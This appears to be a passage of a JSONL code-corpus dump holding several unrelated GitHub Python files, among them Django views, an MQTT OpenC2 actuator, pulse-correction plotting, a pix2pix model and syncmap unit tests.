]:\n\n\n\n","repo_name":"wri/Aqueduct30Docker","sub_path":"notebooks/production/Y2018M12D06_RH_Master_Shape_V01.py","file_name":"Y2018M12D06_RH_Master_Shape_V01.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"17868062707","text":"# 有点类似有效ip,回溯法\n\n# nums = input().strip()\nnums = '12'\ncur = ''\nret = []\n\n\ndef DECODE(nums, cur_result):\n if len(nums) == 0:\n ret.append(cur_result)\n t = ''\n for i in range(len(nums)):\n t += nums[i]\n if int(t) < 27:\n DECODE(nums[i+1:], cur_result + chr(int(t)-1 + ord('A')))\n else:\n t = nums[i]\n DECODE(nums[i+1:], cur_result + chr(int(t)-1 + ord('A')))\n\n\nDECODE(nums, '')\nfor i in range(len(ret)):\n print(ret[i], end='')\n if i != len(ret)-1:\n print()\n","repo_name":"Nobody0321/MyCodes","sub_path":"OJ/笔试/字节跳动_20190908第4题编码.py","file_name":"字节跳动_20190908第4题编码.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71997065443","text":"import tqdm\nfrom qiskit.dagcircuit import DAGCircuit\n\n\ndef fast_circuit_to_dag(circuit):\n dag = DAGCircuit()\n dag.name = circuit.name\n\n for qreg in circuit.qregs:\n dag.add_qreg(qreg)\n for creg in circuit.cregs:\n dag.add_creg(creg)\n\n for instruction, qargs, cargs in tqdm.tqdm(circuit.data, desc=\"Circuit to DAG\"):\n dag.apply_operation_back(instruction.copy(), qargs, cargs,\n instruction.condition)\n return dag","repo_name":"CantelopePeel/QQ","sub_path":"qq/qiskit_utils.py","file_name":"qiskit_utils.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17854098987","text":"from matplotlib import pyplot as plt\nfrom scipy.special import factorial\nimport numpy as np\nimport random\nplt.rcParams.update({'font.size': 13})\n\n\ndef calculate_integral(dy, uy):\n I_dy = np.sum(dy*(1/101))\n I_uy = np.sum(uy*(9/900))\n print('Integral for deformed pulses:\\n',\n 'Droop integral:', I_dy, '\\n', 'Undershoot integral:', I_uy)\n\ndef plot_pulse(x,y,name):\n plt.plot(x, y, label='Original pulse')\n plt.xlabel('Time')\n plt.ylabel('Voltage')\n plt.title(f'Ideal {name} pulse')\n plt.legend(loc='best')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/pulse_plot_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/pulse_plot_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\ndef ideal_square_pulse():#artificial square pulse algorithm\n x = np.linspace(0,10,1001)\n up_y = Amp * np.ones(101)\n low_y = np.zeros(900)\n y = np.concatenate((up_y, low_y))\n plot_pulse(x,y,'Square')\n return y\n\ndef ideal_gaussian_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = Amp * np.exp(-(x-2)**2/(0.2))\n plot_pulse(x,y,'Gaussian')\n return y\n\n\ndef ideal_2gaussian_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = Amp*0.05*np.exp(-(x-1.5)**2/(0.2)) + Amp * np.exp(-(x-3.5)**2/(0.2))\n plot_pulse(x,y,'Gaussian')\n return y\n\ndef ideal_poisson_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = Amp*np.exp(-5)*np.power(5, x)/factorial(x)\n plot_pulse(x,y,'Poisson')\n return y\n\ndef noisy_gaussian_pulse():#artificial gaussian pulse algorithm\n x = np.linspace(0,10,1001)\n y = []\n for i in range(0, len(x)):\n noise = random.randrange(-10, 10, 1)\n yi = Amp * (np.exp(-(x[i]-2)**2/(0.2))+ 0.007*noise)\n y.append(yi)\n y = np.asarray(y)\n plot_pulse(x,y,'Noisy Gaussian')\n return y\n\ndef droop_pulse(int_check):#manually deforme a square pulse by a tau constant\n up_x = np.linspace(0,1.,101)#upper part of the pulse for the droop, lower for the undershoot\n low_x = np.linspace(1.01,10.,900)\n dy = Amp * np.exp(-up_x/tau)\n uy = Amp * (np.exp(-width/tau)-1)*np.exp(-(low_x-width)/tau)\n x = np.linspace(0,10,1001)\n y = np.concatenate((dy, uy))\n return x, y\n\ndef droop(int_check, ideal_pulse):\n x = np.linspace(0,10,1001)\n y = ideal_pulse\n dt = np.diff(x)[0] #width of time slice\n A = (tau/dt) * (1-np.exp(-dt/tau))\n S = 0\n X = [A*y[0]]\n for i in range(1, len(x)):\n sj = y[i-1] + S*np.exp(-dt/tau)\n xj = A*y[i] - (dt*A*A/tau)*sj\n S = sj\n X.append(xj)\n if int_check == 'True':\n #inital check for both integrals (droop and undershoot)\n '''#between 0 to 10 the integrals are: (0 to 1) 0.787103603082587, (1 to 10) -0.7793227436228078\n #between 0 to 100 the integrals are: (0 to 1) 0.787103603082587, (1 to 100) -0.7888281781410758'''\n calculate_integral(dy, uy)\n return x, X\n\ndef correct(int_check, ideal_pulse, name):\n #Algorithm to reconstruct by slices the pulse using single tau approximation\n x, y = droop(int_check, ideal_pulse)\n dt = np.diff(x)[0] #width of time slice\n A = (tau/dt) * (1-np.exp(-dt/tau))\n S = 0\n X0 = ideal_pulse[0]\n X = [X0]\n #get the contribution of each term X[i-1] and S*np.exp(-dt/tau)\n T1 = [(1/A)*y[0]]\n T2 = [0]\n for i in range(1, len(x)):\n sj = X[i-1] + S*np.exp(-dt/tau)\n xj = (1/A)*y[i] + (dt*A/(tau))*sj\n t1 = (1/A)*y[i]\n t2 = (dt*A/tau)*sj\n S = sj\n X.append(xj)\n T1.append(t1)\n T2.append(t2)\n\n #Plot of the drooped pulse and the correction\n plt.plot(x[1:],y[1:], label=r'drooped pulse with $\\tau=$ {}'.format(tau))\n plt.plot(x[1:], X[1:], label='Droop correction')\n plt.xlabel('Time')\n plt.ylabel('Voltage')\n plt.title('Ideal pulse correction')\n plt.legend(loc='best')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/pulse_correction_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/pulse_correction_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\n #Plot of the contributions of each term for the correction\n plt.plot(x,T1, label=r'Term $\\frac{1}{A}\\,V_j$')\n plt.plot(x, T2, label=r'Term $\\frac{A\\,dt}{\\tau}\\,S_j$')\n plt.title('Contribution of each term to the correction')\n plt.xlabel('Time')\n plt.ylabel('Voltage')\n plt.legend(loc='best')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/pulse_each_term_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/pulse_each_term_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\n #plot of the difference between the original pulse and the corrected\n plt.plot(x[1:], ideal_pulse[1:]-X[1:])\n plt.title('Original-Correction')\n plt.xlabel('Time')\n plt.ylabel('Difference (Original - Corrected pulse)')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/diff_plot_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/diff_plot_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\n\ndef main():\n check_integral = 'False'\n type_pulse_sq = ideal_square_pulse()\n correct(check_integral, type_pulse_sq, 'Square')\n type_pulse_gaus = ideal_gaussian_pulse()\n correct(check_integral, type_pulse_gaus, 'Gaussian')\n type_pulse_2gaus = ideal_2gaussian_pulse()\n correct(check_integral, type_pulse_2gaus, '2Gaussian')\n #type_pulse = ideal_poisson_pulse()\n #correct(check_integral, type_pulse, 'Poisson')\n type_pulse_noise = noisy_gaussian_pulse()\n correct(check_integral, type_pulse_noise, 'Noisy_Gaussian')\n\n\n\nif __name__ == \"__main__\":\n global tau\n global width\n global Amp\n tau = 1.5\n width = 1 #only for drooping manually an square pulse\n Amp = 1.5\n main()\n","repo_name":"stephanyvargas/Correction","sub_path":"reconstruction_ideal_pulse.py","file_name":"reconstruction_ideal_pulse.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20437628780","text":"# https://www.codeeval.com/open_challenges/40/\nimport sys\ntest_cases = open(sys.argv[1], 'r')\n# test_cases = open('self_describing_numbers.txt', 'r')\ntest_lines = (line.rstrip() for line in test_cases)\n\nfor test in test_lines:\n\tsuccess = 1\n\tfor pos, val in enumerate(test):\n\t\tif int(val) != test.count(str(pos)):\n\t\t\tsuccess = 0\n\tsys.stdout.write(str(success))\n\tsys.stdout.write(\"\\n\")\n\tsys.stdout.flush()\n","repo_name":"stascrash/codeeval","sub_path":"self_describing_numbers.py","file_name":"self_describing_numbers.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20107097786","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom .models import SPARQLModel\n\n\ndef index(request):\n employees = SPARQLModel().get_employees()\n roles = SPARQLModel().get_roles()\n departments = SPARQLModel().get_departments()\n levels = SPARQLModel().get_levels()\n leaves = SPARQLModel().get_leaves()\n employment_types = SPARQLModel().get_employment_type()\n education = SPARQLModel().get_education()\n branches = SPARQLModel().get_branches()\n projects = SPARQLModel().get_projects()\n return render(request, 'home.html', {'roles': roles, 'departments': departments, 'levels': levels, 'leaves': leaves,\n 'employment_type': employment_types, 'education': education,\n 'branches': branches, 'projects': projects, 'employees': employees})\n\n\ndef description(request):\n if request.method == 'GET':\n if request.GET['employee_id'] != \"\":\n employee = SPARQLModel().employee_details(id=request.GET['employee_id'])\n return render(request, 'description.html', {'employee': employee})\n return render(request, 'description.html')\n\n\ndef search_results(request):\n if request.method == 'GET':\n if request.GET['emp_name'] != \"\":\n employees = SPARQLModel().search_employees(request.GET['emp_name'])\n else:\n employees = SPARQLModel().get_employees()\n response = {'employees': employees}\n return JsonResponse(response)\n\n\ndef advance_search(request):\n if request.method == 'GET':\n filters = {}\n if request.GET['emp_name'] != \"\":\n filters['name'] = request.GET['emp_name']\n if request.GET['emp_dept'] != \"\":\n filters['department'] = request.GET['emp_dept']\n roles = SPARQLModel().get_department_roles(department=filters['department'])\n else:\n roles = SPARQLModel().get_roles()\n if request.GET['emp_role'] != \"\":\n filters['role'] = request.GET['emp_role']\n if request.GET['emp_branch'] != \"\":\n filters['branch'] = request.GET['emp_branch']\n if request.GET['emp_employ_type'] != \"\":\n filters['employment_type'] = request.GET['emp_employ_type']\n if request.GET['emp_leave'] != \"\":\n filters['leave'] = request.GET['emp_leave']\n employees = SPARQLModel.get_advance_search(filters=filters)\n response = {'roles': roles, 'employees': employees}\n return JsonResponse(response)\n\n","repo_name":"saichandreddykamana/Master-s-Assignments","sub_path":"Employee_Management_System/EMS/EmployeeSystem/EmployeeSystem/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5540077976","text":"from oslo_log import log\nimport six\nfrom voluptuous import All\nfrom voluptuous import Any\nfrom voluptuous import Invalid\nfrom voluptuous import Length\nfrom voluptuous import Marker\nfrom voluptuous import Required\nfrom voluptuous import Schema\nfrom voluptuous import Upper\n\nfrom monasca_api.v2.common.schemas import exceptions\n\n\nLOG = log.getLogger(__name__)\n\nMAX_ITEM_LENGTH = 50\n\n\ndef validate_action_list(notification_ids, action_type):\n if not isinstance(notification_ids, list):\n raise Invalid('Not a list: {}'.format(type(notification_ids)))\n existing = []\n for notification_id in notification_ids:\n if not isinstance(notification_id, (str, six.text_type)):\n raise Invalid('list item <{}> -> {} not one of (str, unicode)'\n .format(notification_id, type(notification_id)))\n if len(notification_id) > MAX_ITEM_LENGTH:\n raise Invalid('length {} > {}'.format(len(notification_id),\n MAX_ITEM_LENGTH))\n if notification_id in existing:\n raise Invalid('Duplicate {} notification method {}'\n .format(action_type, notification_id))\n existing.append(notification_id)\n\n\ndef validate_ok_action_list(v):\n validate_action_list(v, 'OK')\n\n\ndef validate_alarm_action_list(v):\n validate_action_list(v, 'ALARM')\n\n\ndef validate_undetermined_action_list(v):\n validate_action_list(v, 'UNDETERMINED')\n\n\nalarm_definition_schema = {\n Required('name'): All(Any(str, six.text_type), Length(max=255)),\n Required('expression'): All(Any(str, six.text_type)),\n Marker('description'): All(Any(str, six.text_type), Length(max=255)),\n Marker('severity'): All(Upper, Any('LOW', 'MEDIUM', 'HIGH', 'CRITICAL')),\n Marker('match_by'): Any([six.text_type], [str]),\n Marker('ok_actions'): validate_ok_action_list,\n Marker('alarm_actions'): validate_alarm_action_list,\n Marker('undetermined_actions'): validate_undetermined_action_list,\n Marker('actions_enabled'): bool}\n\n\ndef validate(msg, require_all=False):\n try:\n request_body_schema = Schema(alarm_definition_schema,\n required=require_all,\n extra=True)\n request_body_schema(msg)\n except Exception as ex:\n LOG.debug(ex)\n raise exceptions.ValidationException(str(ex))\n","repo_name":"openstack/monasca-api","sub_path":"monasca_api/v2/common/schemas/alarm_definition_request_body_schema.py","file_name":"alarm_definition_request_body_schema.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"54"} +{"seq_id":"18719063169","text":"\"\"\"\nAuthor: Noa Kirschbaum\nAssignment / Part: HW10 - Q2\nDate due: 2022-05-05\nI pledge that I have completed this assignment without\ncollaborating with anyone else, in conformance with the\nNYU School of Engineering Policies and Procedures on\nAcademic Misconduct.\n\"\"\"\n\nfrom hw10_q1 import Weapon\nimport random\n\nclass Duelist:\n def __init__(self, duelist_name, weapon_inventory):\n self.duelist_name = duelist_name\n self.weapon_inventory = weapon_inventory\n self.number_of_weapons = len(weapon_inventory)\n\n def __str__(self):\n final_str = \"Duelist object {}, carrying\".format(self.duelist_name)\n for i in range(self.number_of_weapons):\n if i+1 == self.number_of_weapons:\n final_str += \" and {} Weapon objects.\".format(self.weapon_inventory[i].weapon_name)\n else:\n final_str += \" {},\".format(self.weapon_inventory[i].weapon_name)\n\n return final_str\n\n def get_winner_of_duel_name(self, opponent):\n\n if self.number_of_weapons > 0 and opponent.number_of_weapons > 0:\n\n duelist_weapon = self.weapon_inventory[random.randint(0,self.number_of_weapons-1)]\n print(\"Duelist {} picked a {}!\".format(self.duelist_name, duelist_weapon.weapon_name))\n opponent_weapon = opponent.weapon_inventory[random.randint(0,opponent.number_of_weapons-1)]\n print(\"Duelist {} picked a {}!\".format(opponent.duelist_name, opponent_weapon.weapon_name))\n\n if duelist_weapon.strength > opponent_weapon.strength:\n if not duelist_weapon.does_break():\n return self.duelist_name\n else:\n print(\"{}'s weapon broke!\".format(self.duelist_name))\n return opponent.duelist_name\n elif duelist_weapon.strength < opponent_weapon.strength:\n if not opponent_weapon.does_break():\n return opponent.duelist_name\n else:\n print(\"{}'s weapon broke!\".format(opponent.duelist_name))\n return self.duelist_name\n else:\n print(\"Both duelists picked weapons of the same strength! The winner will be decided purely by pseudo-randomly generenated numbers!\")\n random_num = random.randint(1, 2)\n print(\"random number:\", random_num)\n if random_num == 1:\n return self.duelist_name\n else:\n return opponent.duelist_name\n\n\n\n\n elif self.number_of_weapons > 0 and opponent.number_of_weapons <= 0:\n print(\"Only one duelist has a weapon!\")\n return self.duelist_name\n elif opponent.number_of_weapons > 0 and self.number_of_weapons <= 0:\n print(\"Only one duelist has a weapon!\")\n return opponent.duelist_name\n else:\n return \"NO CONTEST.\"\n\n\ndef main():\n # Creating my Weapon objects\n weapon_1 = Weapon(\"Rickenbacker 4001c64\", 0.8)\n weapon_2 = Weapon(\"Hofner 500/1\", 0.6)\n weapon_3 = Weapon(\"Squier VI\", 0.4)\n weapon_4 = Weapon(\"Rickenbacker 330\", 0.8)\n weapon_5 = Weapon(\"Fender Vintera 60s Mustang\", 0.6)\n weapon_6 = Weapon(\"Gretsch 6122\", 0.4)\n # Creating my Duelist objects\n bass_player = Duelist(\"Aki Mizuguchi\", [weapon_1, weapon_2, weapon_3])\n guitarist = Duelist(\"Yori Asanagi\", [weapon_4, weapon_5, weapon_6])\n # Testing the get_winner_of_duel_name method of the Duelist object 'bass_player' a few times\n number_of_duels = 10\n for duel_number in range(number_of_duels):\n winner = bass_player.get_winner_of_duel_name(guitarist)\n print(\"THE WINNER OF DUEL #{} IS {}!\".format(duel_number + 1, winner), end=\"\\n\\n\")\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"NSkyeKirsch/Hw10-CS1114","sub_path":"hw10_q2.py","file_name":"hw10_q2.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2359249819","text":"from examples.Visitor.visitor_example import App, Beverage, Snack, CompositeProduct, ConcreteVisitor\n\n\ndef test_visitor():\n app = App()\n products = [Beverage(), Snack(), Snack()]\n composite = CompositeProduct()\n for product in products:\n composite.add(product)\n visitor = ConcreteVisitor()\n assert app.main(p=composite, v=visitor) == 1500 + 2000 + 2000\n","repo_name":"Buzzvil/awesome-design-patterns","sub_path":"examples/Visitor/test_visitor_example.py","file_name":"test_visitor_example.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"20918781017","text":"# Ejercicio 1 : Llenar una lista\n# Llenar una lista con los numeros del 1 al 50, luego mostrar\n#la lista con el bucle for, los elementos deben mostrase\n# de la siguiente forma:\n#1-2-3-4-5... -50\n\nlista = []\nfor i in range(51):\n lista.append(i)\n print(i, end=\"-\")\n\n","repo_name":"DanielGuerrero03/TecnicaturaGit","sub_path":"Python/Leccion4/Ejercicio01.py","file_name":"Ejercicio01.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30299365216","text":"import ssl\nimport traceback\nimport paho.mqtt.client as mqtt\n\nfrom benedict import benedict\nfrom paho.mqtt.packettypes import PacketTypes\nfrom paho.mqtt.properties import Properties\nimport toml\nfrom oc2.message_manager import HEADERS_ACTUATOR_ID_PATH, HEADERS_REQUEST_ID_PATH, build_response_msg_bytes, process_oc2_msg, validate_msg_required_properties, validate_schema\n\nfrom utils.utils import convert_to_dict, find_file_names_by_extension, load_file\nfrom main import client_id\n\ndef on_connect(client, userdata, flags, rc):\n print(\"mqtt: New mqtt instance connected\")\n # client.subscribe(\"$SYS/#\")\n client.connected_flag=True \n\n\ndef on_log(client, userdata, level, buf):\n print(\"mqtt: \", buf) \n\n\ndef publish(topic = None, msg = \"test\"):\n\n if topic is None:\n topic = default_rsp_topics[0]\n\n print(\"mqtt: Publishing ->\")\n print(\"\\t Topic \\t\\t=\" ,topic) \n print(\"\\t Message \\t=\" ,msg) \n b_msg = msg.encode('utf-8').strip() \n\n openc2_properties = Properties(PacketTypes.PUBLISH)\n if \"v3\" in default_protocol:\n openc2_properties = None \n else:\n openc2_properties.PayloadFormatIndicator = 1\n openc2_properties.ContentType = 'application/openc2'\n openc2_properties.UserProperty = [('msgType', 'rsp'), ('encoding', 'json')] \n\n qos = 0\n retain = False\n\n return client.publish(topic, b_msg, qos, retain, openc2_properties)\n\n\ndef on_message(client, userdata, message):\n try:\n msg_str = str(message.payload.decode(\"utf-8\"))\n print(\"MQTT Message Received *\")\n print(\"\\t Message \\t=\" ,msg_str)\n print(\"\\t Topic \\t\\t=\",message.topic)\n print(\"\\t QOS \\t\\t=\",message.qos)\n print(\"\\t Retain flag \\t=\",message.retain) \n\n message_dict = convert_to_dict(msg_str)\n msg_benedict = benedict(message_dict)\n\n # Load Schema\n config_data = toml.load(\"config.toml\")\n path = config_data[\"schema_path\"]\n filename = config_data[\"schema_file\"]\n schema_dict = load_file(path, filename)\n \n # Validate\n invalid_schema = validate_schema(schema_dict)\n if invalid_schema:\n raise Exception(invalid_schema)\n\n invalid_msg = validate_msg_required_properties(msg_benedict)\n if invalid_msg:\n raise Exception(invalid_msg)\n\n # Do work... \n status = 200\n work_result = \"No work performed\" \n if invalid_schema == None and invalid_msg == None: \n work_result = process_oc2_msg(msg_benedict)\n\n except Exception as e:\n print(traceback.format_exc())\n status = 500\n work_result = \"Error processing mqtt message: \" + traceback.format_exc()\n\n # Build Response\n response_msg = build_response_msg_bytes(msg_benedict[HEADERS_REQUEST_ID_PATH],\n client_id,\n status,\n msg_benedict[HEADERS_ACTUATOR_ID_PATH],\n work_result) \n\n publish(default_rsp_topics[0], response_msg)\n\n\ndef set_user_pw(user: str = None, pw: str = None):\n\n if user is None:\n user = default_username\n\n if pw is None:\n pw = default_password\n\n client.username_pw_set(user, pw)\n client.tls_set(certfile=None,\n keyfile=None,\n cert_reqs=ssl.CERT_REQUIRED) \n\n\ndef connect_to_broker(broker: str = None, port: str = None):\n\n if broker is None:\n broker = default_broker\n\n if port is None:\n port = default_port \n\n try:\n client.connect(broker, port) \n except Exception:\n print(\"mqtt: Unable to connect to MQTT Broker\")\n print(traceback.format_exc()) \n\n\ndef subscribe_to_topics(topics: list = None):\n\n if topics is None:\n topics = []\n topics.extend(default_cmd_topics)\n\n for topic in topics:\n print(\"mqtt: Subscribing to Topic: \", topic)\n client.subscribe(topic) \n\n\ndef shutdown():\n print(\"Shutting down MQTT Instance: \", client_id)\n client.disconnect()\n client.loop_stop()\n\n\nconfig_data = toml.load(\"config.toml\")\ndefault_broker = config_data[\"MQTT\"][\"broker\"]\ndefault_port = config_data[\"MQTT\"][\"port\"]\ndefault_protocol = config_data[\"MQTT\"][\"protocol\"]\n\ndefault_cmd_topics = config_data[\"MQTT\"][\"listen_topics\"]\ndefault_rsp_topics = config_data[\"MQTT\"][\"resp_topics\"] \n\ndefault_username = config_data[\"MQTT\"]['username'] \ndefault_password = config_data[\"MQTT\"]['password'] \n\nif default_protocol == \"MQTTv5\":\n client = mqtt.Client(client_id, None, userdata=True, protocol=mqtt.MQTTv5, transport=\"tcp\") \nelse:\n client = mqtt.Client(client_id, None, userdata=True, protocol=mqtt.MQTTv311, transport=\"tcp\") \n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_log = on_log\n\nprint(\"MQTT Instance Started\")\nprint(\"\\t Client ID \\t\\t= \", client_id)\nprint(\"\\t Default Broker \\t= \", default_broker)\nprint(\"\\t Default Port \\t\\t= \", default_port)\nprint(\"\\t Default Protocol \\t= \", default_protocol)\nprint(\"\\t Default CMD Topics \\t= \", default_cmd_topics)\nprint(\"\\t Default RSP Topics \\t= \", default_rsp_topics)\nprint() \n\nhb_path = config_data[\"KESTREL\"][\"huntbook_paths\"][0]\nprint(\"Kestrel Info:\")\nprint(\"\\t Datasources \\t\\t= \", config_data[\"KESTREL\"][\"datasources\"])\nprint(\"\\t Huntbook Paths \\t= \", config_data[\"KESTREL\"][\"huntbook_paths\"])\nprint(\"\\t Huntbooks Available \\t= \", find_file_names_by_extension(\"hf\", hb_path))\nprint() ","repo_name":"oasis-open/openc2-oif-device","sub_path":"transports/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"20209710399","text":"import unittest\n\nfrom aeneas.exacttiming import Decimal\nfrom aeneas.exacttiming import TimeInterval\nfrom aeneas.exacttiming import TimeValue\nfrom aeneas.language import Language\nfrom aeneas.syncmap import SyncMap\nfrom aeneas.syncmap import SyncMapFormat\nfrom aeneas.syncmap import SyncMapFragment\nfrom aeneas.syncmap import SyncMapMissingParameterError\nfrom aeneas.textfile import TextFragment\nimport aeneas.globalconstants as gc\nimport aeneas.globalfunctions as gf\n\n\nclass TestSyncMap(unittest.TestCase):\n\n NOT_EXISTING_SRT = gf.absolute_path(\"not_existing.srt\", __file__)\n EXISTING_SRT = gf.absolute_path(\"res/syncmaps/sonnet001.srt\", __file__)\n NOT_WRITEABLE_SRT = gf.absolute_path(\"x/y/z/not_writeable.srt\", __file__)\n\n PARAMETERS = {\n gc.PPN_TASK_OS_FILE_SMIL_PAGE_REF: \"sonnet001.xhtml\",\n gc.PPN_TASK_OS_FILE_SMIL_AUDIO_REF: \"sonnet001.mp3\",\n gc.PPN_SYNCMAP_LANGUAGE: Language.ENG,\n }\n\n def read(self, fmt, multiline=False, utf8=False, parameters=PARAMETERS):\n syn = SyncMap()\n if multiline and utf8:\n path = \"res/syncmaps/sonnet001_mu.\"\n elif multiline:\n path = \"res/syncmaps/sonnet001_m.\"\n elif utf8:\n path = \"res/syncmaps/sonnet001_u.\"\n else:\n path = \"res/syncmaps/sonnet001.\"\n syn.read(fmt, gf.absolute_path(path + fmt, __file__), parameters=parameters)\n return syn\n\n def write(self, fmt, multiline=False, utf8=False, parameters=PARAMETERS):\n suffix = \".\" + fmt\n syn = self.read(SyncMapFormat.XML, multiline, utf8, self.PARAMETERS)\n handler, output_file_path = gf.tmp_file(suffix=suffix)\n syn.write(fmt, output_file_path, parameters)\n gf.delete_file(handler, output_file_path)\n\n def test_read(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_read_m(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt, multiline=True)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_read_u(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt, utf8=True)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_read_mu(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt, multiline=True, utf8=True)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_write(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt)\n\n def test_write_m(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt, multiline=True)\n\n def test_write_u(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt, utf8=True)\n\n def test_write_mu(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt, multiline=True, utf8=True)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"readbeyond/aeneas","sub_path":"aeneas/tests/test_syncmap_all.py","file_name":"test_syncmap_all.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":2298,"dataset":"github-code","pt":"54"} +{"seq_id":"74814281762","text":"import torch\nimport os\n\nfrom torch.autograd import Variable\n\n\nclass Pix2Pix:\n def __init__(self, generator, discriminator):\n cuda = bool(os.environ.get('CUDA'))\n lr = float(os.environ.get('LR'))\n beta = (0.5, 0.999)\n\n self.generator = generator.cuda()\n self.discriminator = discriminator.cuda()\n\n self.optimizer_gen = torch.optim.Adam(self.generator.parameters(), lr=lr, betas=beta)\n self.optimizer_disc_b = torch.optim.Adam(self.discriminator.parameters(), lr=lr, betas=beta)\n\n self.mse_loss = torch.nn.MSELoss()\n self.l1_loss = torch.nn.L1Loss()\n self.adv_lamda = 1\n self.cycle_lambda = 10\n\n tensor = torch.cuda.FloatTensor if cuda else torch.Tensor\n self.target_real = Variable(tensor(1, 1).fill_(1.0), requires_grad=False)\n self.target_fake = Variable(tensor(1, 1).fill_(0.0), requires_grad=False)\n\n def train_step(self, batch):\n # Set model input\n\n real_a = Variable(batch['HE']).cuda()\n real_b = Variable(batch['PAS']).cuda()\n\n self.optimizer_gen.zero_grad()\n\n # GAN loss\n fake_b = self.generator(real_a)\n loss_l1 = self.l1_loss(fake_b, real_b) * self.adv_lamda\n\n # gan loss:\n fake_ab = torch.cat((real_a, fake_b), 1)\n pred_fake = self.discriminator(fake_ab)\n loss_gen_a2b = self.mse_loss(pred_fake, self.target_real) * self.adv_lamda\n\n # Total loss\n total_loss = loss_l1 + loss_gen_a2b\n total_loss.backward()\n self.optimizer_gen.step()\n\n self.optimizer_disc_b.zero_grad()\n with torch.no_grad():\n fake_b = self.generator(real_a)\n pred_fake = self.discriminator(torch.cat((real_a, fake_b), 1)) * self.adv_lamda\n pred_real = self.discriminator(torch.cat((real_a, real_b), 1)) * self.adv_lamda\n loss_disc_b = self.mse_loss(pred_fake, self.target_fake) + self.mse_loss(pred_real, self.target_real)\n\n loss_disc_b.backward()\n self.optimizer_disc_b.step()\n\n def predict(self, img):\n if torch.is_tensor(img):\n return self.generator(img.cuda()).detach().cpu().numpy()\n else:\n return self.generator(torch.from_numpy(img).cuda()).detach().cpu().numpy()\n","repo_name":"Falien164/StainConverter","sub_path":"torch_library/models/pix2pix.py","file_name":"pix2pix.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19658058777","text":"\"\"\"\n RGB\n principle_point, (rgb[rgb],rgb2world,focal_length) \n Depth\n lut, (depth[cam])\n Human\n (head[world], lefthand[world], righthand[world], gaze[world])\n Rig\n rig2cam,(rig2world) \n\"\"\"\n\n__all__ = [\n \"RGBDataset\",\n \"DepthDataset\",\n \"HumanDataset\",\n 